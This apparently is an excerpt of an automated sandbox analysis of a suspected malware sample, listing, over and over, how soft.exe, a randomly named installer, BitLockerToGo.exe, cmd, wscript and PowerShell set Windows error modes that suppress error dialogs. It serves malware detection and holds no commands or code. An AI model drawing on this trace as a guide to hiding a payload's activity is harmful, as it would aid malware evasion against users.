                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,12_2_0041F128
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
